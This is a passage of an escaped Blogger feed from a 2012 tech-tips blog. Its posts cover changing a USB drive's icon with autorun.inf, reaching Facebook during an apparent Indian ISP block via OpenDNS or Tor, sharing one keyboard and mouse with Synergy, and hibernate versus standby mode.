•&amp;nbsp;&amp;nbsp;&amp;nbsp; Icon image file in &lt;strong&gt;.ico&lt;/strong&gt; format (you can either download or create your own using &lt;a href=&quot;http://download.cnet.com/Image-Icon-Converter/3000-2195_4-10262097.html&quot;&gt;this &lt;/a&gt;software)&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;How to make&lt;/strong&gt;&lt;br /&gt;

1.&amp;nbsp;&amp;nbsp;&amp;nbsp; Insert your USB Pen Drive and open it.&lt;br /&gt;
&lt;br /&gt;

2.&amp;nbsp;&amp;nbsp;&amp;nbsp; Create a Notepad file in it and write in the following values as shown below&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK-X8y4EJ5PsyyNREjRjS3dMq9Au1Unf3sfIHeVEXe_k_P9lm9Pbt-CchDPRuxmxn6F6nTnvIYnaO0BmsYJkirVJBM4fCbEhRcs-R1CMmbc0hcIidrDwJniPxw4O1DQvsQIlLnHQkfct4/s1600/untitled.bmp&quot; imageanchor=&quot;1&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK-X8y4EJ5PsyyNREjRjS3dMq9Au1Unf3sfIHeVEXe_k_P9lm9Pbt-CchDPRuxmxn6F6nTnvIYnaO0BmsYJkirVJBM4fCbEhRcs-R1CMmbc0hcIidrDwJniPxw4O1DQvsQIlLnHQkfct4/s1600/untitled.bmp&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;/div&gt;
&lt;br /&gt;


3.&amp;nbsp;&amp;nbsp;&amp;nbsp; Here &lt;strong&gt;Label &lt;/strong&gt;is the name of the drive and &lt;strong&gt;Icon &lt;/strong&gt;refers to the name of your icon file.&lt;br /&gt;

&lt;br /&gt;
4.&amp;nbsp;&amp;nbsp;&amp;nbsp; Save it and then rename it to “&lt;strong&gt;autorun.inf&lt;/strong&gt;”.&lt;br /&gt;

&lt;br /&gt;
5.&amp;nbsp;&amp;nbsp;&amp;nbsp; Ensure that autorun and ico files are present in the drive &lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;all time&lt;/span&gt; (you may also hide them).&lt;br /&gt;

&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;The drive will show the new icon when you insert it the next time. So tell me how you liked the trick ..&lt;/b&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/1332330009253321647/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/change-default-drive-icon-of-usb-pen.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1332330009253321647'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/1332330009253321647'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/change-default-drive-icon-of-usb-pen.html' title='Change Default Drive Icon of USB Pen Drive'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaCzeWAE0osxThApjHIoRA1Q-bLX_OmvKSTG0wXwSblP_FP0NVqmG_QI_pO1jJF4MBeh2KNDN_3IMGZmsx9iUs6MQzDiS3e0zk10T10MGPlqW-xEit8y3BtIvStO6F_VYqzPWdziy2EiY/s72-c/changed_icon_pd.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-4444276817266566081</id><published>2012-05-04T10:57:00.001-07:00</published><updated>2012-05-04T12:17:47.078-07:00</updated><title type='text'>Facebook not accessible through some ISP in India [ Solved ]</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;postmeta-primary&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span class=&quot;meta_date&quot;&gt;&lt;/span&gt;&lt;span class=&quot;meta_comments&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;img src=&quot;http://i1.tribune.com.pk/wp-content/uploads/2010/05/facebook-ban-380x252.jpg&quot; /&gt;&lt;/span&gt; &lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Helvetica,Arial,serif; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Helvetica,Arial,serif; line-height: 19px;&quot;&gt;Facebook.com is&amp;nbsp;inaccessible from 12th march 2012 in india through some isp providers.Some website like&amp;nbsp;&lt;/span&gt;
&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;a href=&quot;http://vedified.com/&quot; style=&quot;line-height: 19px;&quot;&gt;vedified&amp;nbsp;&lt;/a&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&amp;nbsp;says
 this is a ban due the going political controversies in the country.The 
ISP&#39;s such as Airtel , Tata communications , 5net , WEFE ,BSNL are 
suspected to ban facebook.com.But after i&amp;nbsp;interrogated&amp;nbsp;&amp;nbsp;with some of the
 &lt;b&gt;facebookers &amp;nbsp;&lt;/b&gt;i came to know that some ISP are working fine now 
while some are still not working.I think this is a temporary problem and
 you don&#39;t need to panic.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;The
 Day Facebook will ban in india you will see people roaming on street 
asking &quot; Hey like my pic&quot; , &quot;Hey Comment on my profile pic&quot;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;- &amp;nbsp;SOLUTION -&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;

&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;1 - Use&lt;b&gt; www.thefacebook.com&lt;/b&gt; to access facebook. worked ? You are done here , if not look down&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;Go to your modem DNS settings and change them to -&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO5oixedWG7PA1D5z0wrJ1AuNtHwJCdjY9W59Ro7Nl8AShxOEvda_2y5XGZ_lm1e2yvYPnV2NnQNdtn4-vT3RdeAGV2DuArbt1BnUi6gkV3UvDuxfygF8j6F27fF0_OqYAfh9woYDPD7Hv/s1600/Capture.PNG&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO5oixedWG7PA1D5z0wrJ1AuNtHwJCdjY9W59Ro7Nl8AShxOEvda_2y5XGZ_lm1e2yvYPnV2NnQNdtn4-vT3RdeAGV2DuArbt1BnUi6gkV3UvDuxfygF8j6F27fF0_OqYAfh9woYDPD7Hv/s1600/Capture.PNG&quot; /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #333333; font-family: Helvetica,Arial,serif;&quot;&gt;&lt;span style=&quot;line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; border-style: none; border-width: 0px; color: #2c2b2b; font-family: arial; line-height: 18px; margin-top: 10px; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;background-color: white;&quot;&gt;Preferred DNS server address for Open DNS is:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; border-style: none; border-width: 0px; color: #2c2b2b; font-family: arial; line-height: 18px; list-style-position: outside; margin: 10px 0px 10px 50px; padding: 0px;&quot;&gt;
&lt;li style=&quot;border-style: none; border-width: 0px; list-style-image: url(&amp;quot;http://blog.navneetsaini.com/wp-content/themes/graphene/images/list-style-image.png&amp;quot;); margin: 0px 0px 7px; padding: 0px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;208.67.222.123&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style=&quot;background-color: white; border-style: none; border-width: 0px; color: #2c2b2b; font-family: arial; line-height: 18px; margin-top: 10px; padding: 0px;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Alternate DNS server address for Open DNS is:&lt;/span&gt;&lt;/div&gt;
&lt;ul style=&quot;background-color: white; border-style: none; border-width: 0px; color: #2c2b2b; font-family: arial; line-height: 18px; list-style-position: outside; margin: 10px 0px 10px 50px; padding: 0px;&quot;&gt;
&lt;li style=&quot;border-style: none; border-width: 0px; list-style-image: url(&amp;quot;http://blog.navneetsaini.com/wp-content/themes/graphene/images/list-style-image.png&amp;quot;); margin: 0px 0px 7px; padding: 0px;&quot;&gt;&lt;span style=&quot;font-size: small;&quot;&gt;&lt;b&gt;208.67.220.123&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;color: #2c2b2b; font-family: arial;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;b&gt;worked ? if yes you are done here , or read below&amp;nbsp; &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #2c2b2b; font-family: arial;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style=&quot;color: #2c2b2b; font-family: arial;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;3 - Downlaod &lt;b&gt;&lt;a href=&quot;http://kuchanrajesh.blogspot.in/2012/04/onion-routing-highly-anonymous.html&quot; target=&quot;_blank&quot;&gt;TOR&lt;/a&gt; &lt;/b&gt;and open through it :D &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;

&lt;/div&gt;
&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/4444276817266566081/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/facebook-not-accessible-through-some.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4444276817266566081'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4444276817266566081'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/facebook-not-accessible-through-some.html' title='Facebook not accessible through some ISP in India [ Solved ]'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO5oixedWG7PA1D5z0wrJ1AuNtHwJCdjY9W59Ro7Nl8AShxOEvda_2y5XGZ_lm1e2yvYPnV2NnQNdtn4-vT3RdeAGV2DuArbt1BnUi6gkV3UvDuxfygF8j6F27fF0_OqYAfh9woYDPD7Hv/s72-c/Capture.PNG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-4882071471059771133</id><published>2012-05-03T10:47:00.001-07:00</published><updated>2013-09-04T09:49:44.531-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computerz"/><title type='text'>How to Control Multiple Computers with a Single Keyboard and Mouse</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;br /&gt;&lt;br /&gt;If you have two or more computers at one desk, you don’t want two or 
more sets of keyboards and mice cluttering up your workspace, too. You 
can buy a hardware gadget that lets you share a single keyboard and 
mouse with several computers (which involves a mess of tangled wires), 
or you could use a free software solution called Synergy. The&amp;nbsp;&lt;a href=&quot;http://synergy-foss.org/&quot;&gt;Synergy&lt;/a&gt;&amp;nbsp;application
 runs on all the computers you’re using—the one that has the keyboard 
and mouse connected and the one(s) that do not—and lets you control all 
of them from that keyboard and mouse. That means you can move your mouse
 off one computer’s screen and it will appear on the other, where you 
can type and work as well. Synergy also lets you share Clipboard 
contents between computers. If you copy information to the Clipboard on 
one computer and move your mouse to the other, you can paste it there, 
even though they’re two different systems.&lt;br /&gt;
&lt;br /&gt;

&lt;div&gt;
&lt;em&gt;Note: We’ve covered Synergy in the past, but a recent update to
 the Synergy application has made setting up and using Synergy even 
easier, so we thought it was a good time to update the post and 
highlight this incredible app again.&lt;/em&gt;&lt;/div&gt;
&lt;div&gt;
&lt;em&gt;&amp;nbsp;&lt;/em&gt;&lt;/div&gt;
Synergy works between any number of PC, Mac, and Linux desktops. 
Below, we’re going to explain how to set up both Windows and Mac sharing
 or Windows-to-Windows to share a single keyboard and mouse using 
Synergy.&lt;br /&gt;
&lt;br /&gt;

Before you get started, you need to know two terms—server PC and 
client PC. When you set up Synergy, you’ll have one “server”: this is 
the computer that has the keyboard and mouse physically connected to it.
 The rest of the computers will be “clients.” First, set up the server.&lt;br /&gt;

&lt;div&gt;
&lt;em&gt;If you’re sharing a keyboard and mouse between two Macs, consider&amp;nbsp;&lt;a href=&quot;http://www.abyssoft.com/software/teleport/&quot;&gt;Teleport&lt;/a&gt;,
 a free, Mac-only tool that works very much like Synergy but is a little
 easier to set up with Mac-only keyboard- and mouse-sharing.&lt;/em&gt;&lt;/div&gt;
&lt;h3&gt;
What You’ll Need:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Two or more computers on the same local network.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Synergy for Windows:&lt;/strong&gt;&amp;nbsp;If you’ll be running one or more Windows PC’s in your setup, download and install the&amp;nbsp;&lt;a href=&quot;http://synergy-foss.org/download&quot;&gt;Synergy Installer&lt;/a&gt;&amp;nbsp;for Windows on each PC. (As of this writing, the current version is labeled 1.4.2 beta.)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SynergyKM for Mac:&lt;/strong&gt;&amp;nbsp;If you want to run one or more Macs on your setup, download and install&lt;a href=&quot;http://sourceforge.net/projects/synergykm/&quot;&gt;SynergyKM&lt;/a&gt;&amp;nbsp;on each Mac you want to use.&lt;/li&gt;
&lt;/ul&gt;
&lt;br /&gt;
&lt;br /&gt;

&lt;em&gt;Note for Linux users:&lt;/em&gt;&amp;nbsp;I haven’t tried it, but&amp;nbsp;&lt;a href=&quot;http://code.google.com/p/quicksynergy/&quot;&gt;quicksynergy&lt;/a&gt;&amp;nbsp;looks like it could be a good graphical interface for Synergy. If you know of a better option, let’s hear it in the comments.&lt;br /&gt;
&lt;br /&gt;

Before you get started, you need to know two terms: server PC and 
client PC. When you set up Synergy, you’ll have one “server”: this is 
the computer that has the keyboard and mouse physically connected to it.
 The rest of the computers will be “clients.” First, set up the server.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

&lt;h3&gt;
Set Up the Synergy Server&lt;/h3&gt;
&lt;img alt=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; src=&quot;http://cache.gawkerassets.com/assets/images/17/2011/11/medium_8495dea9ad0bab1a93ba98fc553ad373.jpg&quot; title=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Download&amp;nbsp;&lt;a href=&quot;http://synergy-foss.org/&quot;&gt;Synergy&lt;/a&gt;&amp;nbsp;for
 Windows and install it on your PC. As of this writing, the most current
 version is Synergy 1.4.2. Install and run Synergy, then select Server 
(Share This Computer’s Mouse and Keyboard).&lt;br /&gt;

Then click the Configure Server button to open a Server Configuration
 dialog, where you’ll add all the computers that will be controlled by 
the server’s keyboard and mouse and their position in relation to each 
other.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

If you want to use a Mac as the server, the process is very similar 
using SynergyKM; launch the preference pane, select Share my keyboard 
and mouse, and move to the Server Configuration tab to set up your 
screens.&lt;br /&gt;
&lt;br /&gt;


&lt;h3&gt;
Configure Multiple Synergy Screens &lt;/h3&gt;
&lt;img alt=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; src=&quot;http://cache.gawkerassets.com/assets/images/17/2011/11/medium_bf234b707a078782878a5ff90379f51d.jpg&quot; title=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
In
 the Screens And Links tab of the server configuration, you should 
already see your host computer in the graphical layout screen. My server
 computer name is Windows, so that’s what the first Synergy screen name 
is.&lt;br /&gt;
&lt;br /&gt;


Now, to add the other computer (your client) to Synergy, you need to 
know its name as well. By default, the client uses the same name as your
 computer on the network (for example, my server is Windows; my client 
is Hack).&lt;br /&gt;
&lt;br /&gt;

To find the name of your computer in Windows, open your Start menu, 
right-click Computer, and select Properties. Your computer name is 
listed under Computer name, domain, and workgroup settings. On a Mac, 
open the Sharing preference pane; your computer name is listed in the 
top text input.&lt;br /&gt;
&lt;br /&gt;


&lt;a href=&quot;http://cache.gawkerassets.com/assets/images/17/2011/11/9dd9ee10d48cc850a7f13c246a96c983.jpg&quot; rel=&quot;lytebox&quot;&gt;&lt;img alt=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; src=&quot;http://cache.gawkerassets.com/assets/images/17/2011/11/medium_9dd9ee10d48cc850a7f13c246a96c983.jpg&quot; title=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Once
 you know your computer’s names, drag and drop the monitor icon from the
 top right of the Screens and Links dialog onto the layout (we’re still 
working on your server PC); drop the new monitor icon next to your 
server in the same layout as your monitors are on your desk. For 
example, my Mac’s monitor is to the left of my Windows monitor. 
Double-click the Unnamed screen you just added, then enter the client’s 
screen name.&lt;br /&gt;
&lt;br /&gt;

When you’re done, you should see two computers on the Screens and 
Links grid that mirror the monitor setup on your workspace. If you have a
 particularly wild screen position (a checkerboard of flat­screens, 
perhaps?), you can even set up screens on top of and below each other 
here.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;

&lt;h3&gt;
Set Up the Synergy Client&lt;/h3&gt;
Download and install Synergy on the client computer (the one without the keyboard and mouse connected).&lt;br /&gt;

&lt;h4&gt;
On Windows&lt;/h4&gt;
&lt;img alt=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; src=&quot;http://cache.gawker.com/assets/images/lifehacker/2011/02/syn05.jpg&quot; title=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If you’re Synergy client is going to be a Windows computer, download the same&lt;a href=&quot;http://synergy-foss.org/download&quot;&gt;Synergy installer for Windows&lt;/a&gt;.
 After you’ve installed your Synergy client, launch Synergy exactly the 
same way as you did on the server, except choose Client (Use Another 
Computer’s Keyboard And Mouse). Enter the name of the server computer. 
To try the connection, click the Start button: first on the server and 
then on the client PC. Try moving the mouse off the server screen. If 
all goes well, it will land on the client screen safely!&lt;br /&gt;


&lt;h4&gt;
On Mac OS X&lt;/h4&gt;
&lt;img alt=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; src=&quot;http://cache.gawkerassets.com/assets/images/17/2011/11/medium_283b22b91abdb35438aeda3bc0c5454c.jpg&quot; title=&quot;How to Control Multiple Computers with a Single Keyboard and Mouse&quot; /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
If the second computer is a Mac, download&lt;a href=&quot;http://sourceforge.net/projects/synergykm/&quot;&gt;SynergyKM&lt;/a&gt;.
 After you’ve installed SynergyKM, launch the SynergyKM preference pane,
 then choose Connect to a shared keyboard and mouse. Enter the name of 
the server computer in the Client Configuration tab and click the Apply 
Now button. To try the connection, click Turn Synergy On in the General 
tab.: first on the server and then on the client PC. Try moving the 
mouse off the server screen. If all goes well, it will transport 
seamlessly to your client PC.&lt;br /&gt;
&lt;br /&gt;

&lt;em&gt;Note: If you have any problems during this step on your Mac, I’ve
 found that entering the server’s local IP address seems to work.&lt;/em&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;



When you’re satisfied with the results, close the Synergy window. 
Synergy will continue running in your system tray, from which you can 
start or stop the application as needed. Now you’re sharing the mouse 
and keyboard between two computers simultaneously. Piece of cake. &lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://techstartx.blogspot.com/feeds/4882071471059771133/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://techstartx.blogspot.com/2012/05/how-to-control-multiple-computers-with.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4882071471059771133'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1282681386430893595/posts/default/4882071471059771133'/><link rel='alternate' type='text/html' href='http://techstartx.blogspot.com/2012/05/how-to-control-multiple-computers-with.html' title='How to Control Multiple Computers with a Single Keyboard and Mouse'/><author><name>asas</name><uri>http://www.blogger.com/profile/09825657881026316382</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1282681386430893595.post-3672981831132033947</id><published>2012-05-02T13:42:00.000-07:00</published><updated>2013-09-04T09:49:44.523-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Computerz"/><title type='text'>What is Hibernate Mode and its advantage over StandBy Mode..</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;color: #666666;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Hibernate mode works
in a way that is a bit different from standby mode.&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;color: #444444; font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;When a computer
enters &lt;b&gt;StandBy mode&lt;/b&gt;, OS turns off most of the devices in the computer (including
the display, hard disks, and peripherals), but keeps just enough power flowing
to keep the information in memory intact—information that includes open windows
and running programs. When you exit standby mode (typically by moving the
mouse or pressing a key), Windows is returned to the state in which you left
it. However,
when a computer is in standby mode, it is still reliant on a power source. If the
power source is interrupted (for example, if the battery runs out), information
in memory
is lost.&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: small;&quot;&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;color: #444444; font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: small;&quot;&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;color: #444444; font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: small;&quot;&gt;When
your computer enters &lt;b&gt;Hibernate Mode&lt;/b&gt;, Windows saves the information in memory (including
open programs and windows) to your hard disk, and then your computer shuts
down. When you start the computer after it has been hibernating, Windows returns
to its previous state. Restarting to the previous state includes automatically restarting
any programs that were running when it went into hibernate mode, and it even
restores any network connections that were active at the time.&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: small;&quot;&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;color: #444444; font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif; line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: small;&quot;&gt;The advantage of hibernation
mode over standby mode is that when a computer is in hibernation mode, it
is not reliant on a power source—the computer is completely shut down.&lt;/span&gt;&lt;/div&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: small;&quot;&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;color: #444444; font-family: Georgia,&amp;quot;Times New Roman&amp;quot;,serif;&quot;&gt;
To
configure your computer to use hibernate mode, use the &lt;b&gt;Power Options&lt;/b&gt; &lt;b&gt;Properties dialog
box&lt;/b&gt;. Click the&lt;b&gt; Hibernate tab&lt;/b&gt; and select the Enable &lt;b&gt;Hibernation check box&lt;/b&gt;. If
the Hibernate
